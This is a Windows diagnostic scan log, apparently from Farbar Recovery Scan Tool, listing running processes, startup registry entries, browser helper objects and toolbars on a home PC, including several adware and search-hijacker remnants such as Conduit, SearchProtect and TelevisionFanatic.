() C:\Program Files (x86)\Intel Driver Update Utility\SUR\SurSvc.exe
(SupportSoft, Inc.) C:\Program Files (x86)\NCNETWORKSDM\bin\sprtsvc.exe
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\YNanoClient\cpn0\YNanoService.exe
(SupportSoft, Inc.) C:\Program Files (x86)\NCNETWORKSDM\bin\tgsrvc.exe
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
() C:\Program Files\Reason\Security\Protection\rscp\bin\rscp_bg.exe
() C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\ModLEDKey.exe
(AVG) C:\Program Files (x86)\AVG\AVG PC Tuneup\BoostSpeed.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\nis.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Oberon Media ) C:\Program Files (x86)\GamesBar\SearchEngineProtection.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Officejet 6700\Bin\ScanToPCActivationApp.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Officejet 6700\Bin\ScanToPCActivationApp.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\dpupdchk.exe
() C:\Users\Ken Terry\AppData\Local\Amazon Music\Amazon Music Helper.exe
() C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Hewlett-Packard Co.) C:\Program Files\hp\HP Officejet 6700\Bin\HPNetworkCommunicator.exe
() C:\Program Files (x86)\Philips\Philips SPC230NC Webcam\TrayMin230.exe
(Dropbox, Inc.) C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Facebook) C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\FacebookMessenger.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\BATINDICATOR.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\CNYHKEY.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr\raptr.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr\raptr_im.exe
(Raptr Inc.) C:\Program Files (x86)\Raptr\raptr_ep64.exe
() C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe
(TweakBit) C:\Program Files (x86)\TweakBit\Driver Updater\DriverUpdater.exe
(TweakBit) C:\Program Files (x86)\TweakBit\Speedtest Optimizer\SpeedtestOptimizer.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Reason Software Company Inc.) C:\Program Files\Reason\Security\rsUI.exe
(Reason Software Company Inc.) C:\Program Files\Reason\Security\rsEngineSvc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
() C:\Program Files\WindowsApps\Microsoft.Windows.Photos_15.618.18170.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [568888 2010-01-18] ()
HKLM\...\Run: [SPC230NC_Monitor] => C:\Windows\Philips\SPC230NC\Monitor.exe
HKLM\...\Run: [SPC_Monitor] => C:\Windows\Philips\SPC230NC\Monitor.exe
HKLM\...\Run: [IntelliPoint] => C:\Program Files\Microsoft IntelliPoint\ipoint.exe [2327952 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [557768 2015-02-03] (Adobe Systems Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-08-13] (Apple Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-03] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [563736 2009-10-14] (PDF Complete Inc)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [284440 2011-04-30] (Intel Corporation)
HKLM-x32\...\Run: [BATINDICATOR] => C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\BATINDICATOR.exe [2068992 2009-05-08] (Hewlett-Packard)
HKLM-x32\...\Run: [LaunchHPOSIAPP] => C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\LaunchApp.exe [385024 2009-04-03] (Hewlett-Packard)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [Microsoft Default Manager] => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
HKLM-x32\...\Run: [TelevisionFanatic Browser Plugin Loader] => C:\PROGRA~2\TELEVI~2\bar\1.bin\64brmon.exe
HKLM-x32\...\Run: [AdobeCS5.5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5.5ServiceManager\CS5.5ServiceManager.exe [1523360 2011-01-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-05-15] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [56080 2015-07-27] (Raptr, Inc)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-06-17] (Apple Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [DriverFinder] => C:\Program Files (x86)\DriverFinder\DriverFinder.exe [7147720 2010-12-26] ()
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [SearchEngineProtection] => C:\Program Files (x86)\Gamesbar\SearchEngineProtection.exe [591248 2010-12-29] (Oberon Media )
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-11-29] (Google Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [HP Officejet 6700 (NET)] => C:\Program Files\hp\HP Officejet 6700\Bin\ScanToPCActivationApp.exe [2676584 2011-09-09] (Hewlett-Packard Co.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [HP Officejet 6700 (NET) #2] => C:\Program Files\hp\HP Officejet 6700\Bin\ScanToPCActivationApp.exe [2676584 2011-09-09] (Hewlett-Packard Co.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [Facebook Update] => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-05-02] (Facebook Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [BackgroundContainer] => "C:\Windows\SysWOW64\Rundll32.exe" "C:\Users\Ken Terry\AppData\Local\Conduit\BackgroundContainer\BackgroundContainer.dll",DllRun <===== ATTENTION
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [A3BF49ACEB10C29711B328C03B82D6FE2CE22E98._service_run] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [815944 2015-09-11] (Google Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3632112 2015-07-15] (Electronic Arts)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [Amazon Music] => C:\Users\Ken Terry\AppData\Local\Amazon Music\Amazon Music Helper.exe [5887808 2015-07-21] ()
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [146736 2014-09-23] ()
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [Dropbox Update] => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-21] (Dropbox, Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53282944 2015-06-29] (Skype Technologies S.A.)
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll => No File
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2015-07-29] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2015-07-29] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2015-07-29] (Google)
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\buShell.dll [2015-07-13] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\buShell.dll [2015-07-13] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\buShell.dll [2015-07-13] (Symantec Corporation)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt.27.dll [2015-08-14] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TrayMin230.lnk [2011-02-03]
ShortcutTarget: TrayMin230.lnk -> C:\Program Files (x86)\Philips\Philips SPC230NC Webcam\TrayMin230.exe ()
Startup: C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2014-08-25]
ShortcutTarget: Dropbox.lnk -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Messenger.lnk [2013-05-02]
ShortcutTarget: Facebook Messenger.lnk -> C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\FacebookMessenger.exe (Facebook)
Startup: C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - .lnk [2013-03-06]
ShortcutTarget: Monitor Ink Alerts - .lnk -> C:\Program Files\hp\HP Officejet 6700\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
Startup: C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Officejet 6700.lnk [2013-11-12]
ShortcutTarget: Monitor Ink Alerts - HP Officejet 6700.lnk -> C:\Program Files\hp\HP Officejet 6700\Bin\HPStatusBL.dll (Hewlett-Packard Co.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{62f3ae2b-33d4-4f19-9278-3f41836001ba}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{cb4ad89f-1afe-4bc5-81f6-1c3648235f12}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{e9b29538-c17f-432d-92db-e0a4401a8254}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=NIS&pvid=22.5.0.124
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=NIS&pvid=22.5.0.124
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgTXLVDB5Nogic6kY3R6sQcMTkW9xX5fNFrygKHoWfBJFzmkaV3mH6p55lJc9PxupzbSdReFxRxFsJb88JMSCbUX6_v8ACjxhyoA-9gti9ZJC6bb7r0M49jBHXSpcJo_M,&q={searchTerms}
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRbHdKIqgRJyMidKuvnhDCuxhZjwitu2603iO2DKTsRdIV5F5NNlgTXLVDB5Nogic6kY3R6sQcMTkW9xX5fNFrygKHoWfBJFzmkaV3mH6p55lJc9PxupzbSdReFxRxFsJb88JMSCbUX6_v8ACjxhyoA-9gti9ZJC6bb7r0M49jBHXSpcJo_M,&q={searchTerms}
URLSearchHook: HKLM-x32 - Yahoo! Axis for IE - {035FDC10-9F1D-430E-87DA-573FFBF5608D} - C:\Program Files (x86)\Yahoo!\YNanoClient\cpn1\YNanoClient_IE.dll (Yahoo! Inc.)
URLSearchHook: HKLM-x32 - (No Name) - {739df940-c5ee-4bab-9d7e-270894ae687a} - No File
URLSearchHook: HKLM-x32 - (No Name) - {06aedb90-98b2-4989-ad0f-39d53551f6ad} - No File
URLSearchHook: HKLM-x32 - Protected Toolbar - {c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} - C:\Program Files (x86)\Protected\prxtbProt.dll No File
URLSearchHook: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 - (No Name) - {0696f815-a3a9-490a-bb14-9ec3350b1276} - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\64SrcAs.dll No File
SearchScopes: HKLM -> {1AC5E05E-C560-46B2-83AB-4E5DBB92F2B2} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {258733A6-9B2C-4CE8-AC9D-3793C0E89DA6} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM -> {9693B710-7943-4C03-B346-5F8ABAFDFD28} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {9FAE6E2C-CDD1-4975-B4C9-5E196B025B78} URL =
SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> {1AC5E05E-C560-46B2-83AB-4E5DBB92F2B2} URL =
SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> {9693B710-7943-4C03-B346-5F8ABAFDFD28} URL =
BHO: QuickShare WidgetEngine -> {31ad400d-1b06-4e33-a59a-90c2c140cba0} -> C:\Windows\system32\mscoree.dll [2015-07-10] (Microsoft Corporation)
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\coIEPlg.dll [2015-07-09] (Symantec Corporation)
BHO: AppGraffiti -> {6F6A5334-78E9-4D9B-8182-8B41EA8C39EF} -> C:\PROGRA~2\APPGRA~1\APPGRA~2.DLL No File
BHO: Updater By SweetPacks -> {7D4F1959-3F72-49d5-8E59-F02F8AA6815D} -> C:\Program Files\Updater By SweetPacks\Extension64.dll No File
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-07-20] (Google Inc.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll [2011-03-15] (Yahoo! Inc.)
BHO-x32: Yahoo! Axis for IE -> {035FDC10-9F1D-430E-87DA-573FFBF5608D} -> C:\Program Files (x86)\Yahoo!\YNanoClient\cpn1\YNanoClient_IE.dll [2012-10-13] (Yahoo! Inc.)
BHO-x32: No Name -> {06aedb90-98b2-4989-ad0f-39d53551f6ad} -> No File
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll [2013-09-06] (McAfee, Inc.)
BHO-x32: No Name -> {1CB20BF0-BBAE-40A7-93F4-6435FF3D0411} -> C:\PROGRA~2\Crawler\Toolbar\ctbr.dll No File
BHO-x32: WebCake -> {2A5A2A90-3B30-4E6E-A955-2F232C6EF517} -> C:\Program Files (x86)\WebCake\WebCakeIEClient.dll No File
BHO-x32: Unit -> {2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3} -> C:\Users\Ken Terry\AppData\Local\UnitLayers\temp.dat No File
BHO-x32: QuickShare WidgetEngine -> {31ad400d-1b06-4e33-a59a-90c2c140cba0} -> C:\Windows\SysWOW64\mscoree.dll [2015-07-10] (Microsoft Corporation)
BHO-x32: Search Assistant BHO -> {5d79f641-c168-40df-a32f-bacea7509e75} -> C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\64SrcAs.dll No File
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\coIEPlg.dll [2015-07-09] (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\21.7.0.11\IPS\IPSBHO.DLL No File
BHO-x32: No Name -> {739df940-c5ee-4bab-9d7e-270894ae687a} -> No File
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-01-24] (Oracle Corporation)
BHO-x32: TidyNetwork.com -> {7736C7FA-512D-11E2-B871-DEC36088709B} -> C:\Users\Ken Terry\AppData\Local\TidyNetwork.com\tidy2ie.dll No File
BHO-x32: Updater By SweetPacks -> {7D4F1959-3F72-49d5-8E59-F02F8AA6815D} -> C:\Program Files\Updater By SweetPacks\Extension32.dll No File
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-07-20] (Google Inc.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Protected Toolbar -> {c5c4fd2c-c7ac-492c-a689-2e0843ba4e55} -> C:\Program Files (x86)\Protected\prxtbProt.dll No File
BHO-x32: GamesBarBHO Class -> {CB0D163C-E9F4-4236-9496-0597E24B23A5} -> C:\Program Files (x86)\GamesBar\2.0.1.81\oberontb.dll [2010-12-29] (Oberon Media Ltd.)
BHO-x32: Toolbar BHO -> {cb41fc95-f1b3-4797-8bb6-1012ff62abba} -> C:\PROGRA~2\TELEVI~2\bar\1.bin\64bar.dll No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-01-24] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: SweetPacks Browser Helper -> {EEE6C35C-6118-11DC-9C72-001320C79847} -> C:\Program Files (x86)\SweetIM\Toolbars\Internet Explorer\mgToolbarIE.dll No File
BHO-x32: SingleInstance Class -> {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll [2011-03-15] (Yahoo! Inc)
Toolbar: HKLM - QuickShare Widget - {ae07101b-46d4-4a98-af68-0333ea26e113} - C:\Windows\system32\mscoree.dll [2015-07-10] (Microsoft Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\coIEPlg.dll [2015-07-09] (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-07-20] (Google Inc.)
Toolbar: HKLM-x32 - GamesBar - {6F282B65-56BF-4BD1-A8B2-A4449A05863D} - C:\Program Files (x86)\GamesBar\2.0.1.81\oberontb.dll [2010-12-29] (Oberon Media Ltd.)
Toolbar: HKLM-x32 - &Crawler Toolbar - {4B3803EA-5230-4DC3-A7FC-33638F3D3542} - C:\PROGRA~2\Crawler\Toolbar\ctbr.dll No File
Toolbar: HKLM-x32 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll [2011-03-15] (Yahoo! Inc.)
Toolbar: HKLM-x32 - TelevisionFanatic - {c98d5b61-b0ea-4d48-9839-1079d352d880} - C:\Program Files (x86)\TelevisionFanatic\bar\1.bin\64bar.dll No File
